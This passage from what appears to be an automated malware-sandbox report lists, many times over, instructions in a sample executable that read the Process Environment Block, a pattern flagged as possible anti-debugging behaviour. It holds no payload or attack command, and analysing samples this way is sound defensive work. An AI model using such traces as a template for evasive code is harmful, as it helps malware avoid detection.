                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov eax, dword ptr fs:[00000030h]3_2_0193273C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C720 mov eax, dword ptr fs:[00000030h]3_2_0193C720
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C720 mov eax, dword ptr fs:[00000030h]3_2_0193C720
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900750 mov eax, dword ptr fs:[00000030h]3_2_01900750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942750 mov eax, dword ptr fs:[00000030h]3_2_01942750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942750 mov eax, dword ptr fs:[00000030h]3_2_01942750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E75D mov eax, dword ptr fs:[00000030h]3_2_0198E75D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01984755 mov eax, dword ptr fs:[00000030h]3_2_01984755
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov esi, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov eax, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov eax, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908770 mov eax, dword ptr fs:[00000030h]3_2_01908770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904690 mov eax, dword ptr fs:[00000030h]3_2_01904690
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904690 mov eax, dword ptr fs:[00000030h]3_2_01904690
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019366B0 mov eax, dword ptr fs:[00000030h]3_2_019366B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C6A6 mov eax, dword ptr fs:[00000030h]3_2_0193C6A6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0193A6C7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A6C7 mov eax, dword ptr fs:[00000030h]3_2_0193A6C7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019806F1 mov eax, dword ptr fs:[00000030h]3_2_019806F1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019806F1 mov eax, dword ptr fs:[00000030h]3_2_019806F1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942619 mov eax, dword ptr fs:[00000030h]3_2_01942619
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E609 mov eax, dword ptr fs:[00000030h]3_2_0197E609
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01936620 mov eax, dword ptr fs:[00000030h]3_2_01936620
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938620 mov eax, dword ptr fs:[00000030h]3_2_01938620
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E627 mov eax, dword ptr fs:[00000030h]3_2_0191E627
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190262C mov eax, dword ptr fs:[00000030h]3_2_0190262C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191C640 mov eax, dword ptr fs:[00000030h]3_2_0191C640
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01932674 mov eax, dword ptr fs:[00000030h]3_2_01932674
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C866E mov eax, dword ptr fs:[00000030h]3_2_019C866E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C866E mov eax, dword ptr fs:[00000030h]3_2_019C866E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A660 mov eax, dword ptr fs:[00000030h]3_2_0193A660
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A660 mov eax, dword ptr fs:[00000030h]3_2_0193A660
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov esi, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov eax, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov eax, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD mov eax, dword ptr fs:[00000030h]3_2_019009AD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD mov eax, dword ptr fs:[00000030h]3_2_019009AD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A9D0 mov eax, dword ptr fs:[00000030h]3_2_0190A9D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019349D0 mov eax, dword ptr fs:[00000030h]3_2_019349D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA9D3 mov eax, dword ptr fs:[00000030h]3_2_019CA9D3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019969C0 mov eax, dword ptr fs:[00000030h]3_2_019969C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019329F9 mov eax, dword ptr fs:[00000030h]3_2_019329F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019329F9 mov eax, dword ptr fs:[00000030h]3_2_019329F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E9E0 mov eax, dword ptr fs:[00000030h]3_2_0198E9E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C912 mov eax, dword ptr fs:[00000030h]3_2_0198C912
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8918 mov eax, dword ptr fs:[00000030h]3_2_018F8918
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8918 mov eax, dword ptr fs:[00000030h]3_2_018F8918
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E908 mov eax, dword ptr fs:[00000030h]3_2_0197E908
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E908 mov eax, dword ptr fs:[00000030h]3_2_0197E908
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198892A mov eax, dword ptr fs:[00000030h]3_2_0198892A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0199892B mov eax, dword ptr fs:[00000030h]3_2_0199892B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4940 mov eax, dword ptr fs:[00000030h]3_2_019D4940
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01980946 mov eax, dword ptr fs:[00000030h]3_2_01980946
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4978 mov eax, dword ptr fs:[00000030h]3_2_019A4978
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4978 mov eax, dword ptr fs:[00000030h]3_2_019A4978
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C97C mov eax, dword ptr fs:[00000030h]3_2_0198C97C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01926962 mov eax, dword ptr fs:[00000030h]3_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov eax, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov edx, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E mov eax, dword ptr fs:[00000030h]3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C89D mov eax, dword ptr fs:[00000030h]3_2_0198C89D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900887 mov eax, dword ptr fs:[00000030h]3_2_01900887
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E8C0 mov eax, dword ptr fs:[00000030h]3_2_0192E8C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D08C0 mov eax, dword ptr fs:[00000030h]3_2_019D08C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C8F9 mov eax, dword ptr fs:[00000030h]3_2_0193C8F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C8F9 mov eax, dword ptr fs:[00000030h]3_2_0193C8F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA8E4 mov eax, dword ptr fs:[00000030h]3_2_019CA8E4
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C810 mov eax, dword ptr fs:[00000030h]3_2_0198C810
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A483A mov eax, dword ptr fs:[00000030h]3_2_019A483A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A483A mov eax, dword ptr fs:[00000030h]3_2_019A483A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A830 mov eax, dword ptr fs:[00000030h]3_2_0193A830
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov ecx, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922835 mov eax, dword ptr fs:[00000030h]3_2_01922835
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930854 mov eax, dword ptr fs:[00000030h]3_2_01930854
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904859 mov eax, dword ptr fs:[00000030h]3_2_01904859
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904859 mov eax, dword ptr fs:[00000030h]3_2_01904859
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01912840 mov ecx, dword ptr fs:[00000030h]3_2_01912840
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996870 mov eax, dword ptr fs:[00000030h]3_2_01996870
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996870 mov eax, dword ptr fs:[00000030h]3_2_01996870
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E872 mov eax, dword ptr fs:[00000030h]3_2_0198E872
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E872 mov eax, dword ptr fs:[00000030h]3_2_0198E872
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4BB0 mov eax, dword ptr fs:[00000030h]3_2_019B4BB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4BB0 mov eax, dword ptr fs:[00000030h]3_2_019B4BB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910BBE mov eax, dword ptr fs:[00000030h]3_2_01910BBE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910BBE mov eax, dword ptr fs:[00000030h]3_2_01910BBE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AEBD0 mov eax, dword ptr fs:[00000030h]3_2_019AEBD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920BCB mov eax, dword ptr fs:[00000030h]3_2_01920BCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900BCD mov eax, dword ptr fs:[00000030h]3_2_01900BCD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908BF0 mov eax, dword ptr fs:[00000030h]3_2_01908BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198CBF0 mov eax, dword ptr fs:[00000030h]3_2_0198CBF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EBFC mov eax, dword ptr fs:[00000030h]3_2_0192EBFC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197EB1D mov eax, dword ptr fs:[00000030h]3_2_0197EB1D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4B00 mov eax, dword ptr fs:[00000030h]3_2_019D4B00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EB20 mov eax, dword ptr fs:[00000030h]3_2_0192EB20
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EB20 mov eax, dword ptr fs:[00000030h]3_2_0192EB20
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C8B28 mov eax, dword ptr fs:[00000030h]3_2_019C8B28
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C8B28 mov eax, dword ptr fs:[00000030h]3_2_019C8B28
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AEB50 mov eax, dword ptr fs:[00000030h]3_2_019AEB50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D2B57 mov eax, dword ptr fs:[00000030h]3_2_019D2B57
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4B4B mov eax, dword ptr fs:[00000030h]3_2_019B4B4B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B4B4B mov eax, dword ptr fs:[00000030h]3_2_019B4B4B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A8B42 mov eax, dword ptr fs:[00000030h]3_2_019A8B42
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996B40 mov eax, dword ptr fs:[00000030h]3_2_01996B40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996B40 mov eax, dword ptr fs:[00000030h]3_2_01996B40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CAB40 mov eax, dword ptr fs:[00000030h]3_2_019CAB40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8B50 mov eax, dword ptr fs:[00000030h]3_2_018F8B50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FCB7E mov eax, dword ptr fs:[00000030h]3_2_018FCB7E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938A90 mov edx, dword ptr fs:[00000030h]3_2_01938A90
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA80 mov eax, dword ptr fs:[00000030h]3_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4A80 mov eax, dword ptr fs:[00000030h]3_2_019D4A80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908AA0 mov eax, dword ptr fs:[00000030h]3_2_01908AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908AA0 mov eax, dword ptr fs:[00000030h]3_2_01908AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956AA4 mov eax, dword ptr fs:[00000030h]3_2_01956AA4
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900AD0 mov eax, dword ptr fs:[00000030h]3_2_01900AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01934AD0 mov eax, dword ptr fs:[00000030h]3_2_01934AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01934AD0 mov eax, dword ptr fs:[00000030h]3_2_01934AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956ACC mov eax, dword ptr fs:[00000030h]3_2_01956ACC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956ACC mov eax, dword ptr fs:[00000030h]3_2_01956ACC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01956ACC mov eax, dword ptr fs:[00000030h]3_2_01956ACC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193AAEE mov eax, dword ptr fs:[00000030h]3_2_0193AAEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193AAEE mov eax, dword ptr fs:[00000030h]3_2_0193AAEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198CA11 mov eax, dword ptr fs:[00000030h]3_2_0198CA11
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01924A35 mov eax, dword ptr fs:[00000030h]3_2_01924A35
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01924A35 mov eax, dword ptr fs:[00000030h]3_2_01924A35
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193CA24 mov eax, dword ptr fs:[00000030h]3_2_0193CA24
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192EA2E mov eax, dword ptr fs:[00000030h]3_2_0192EA2E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
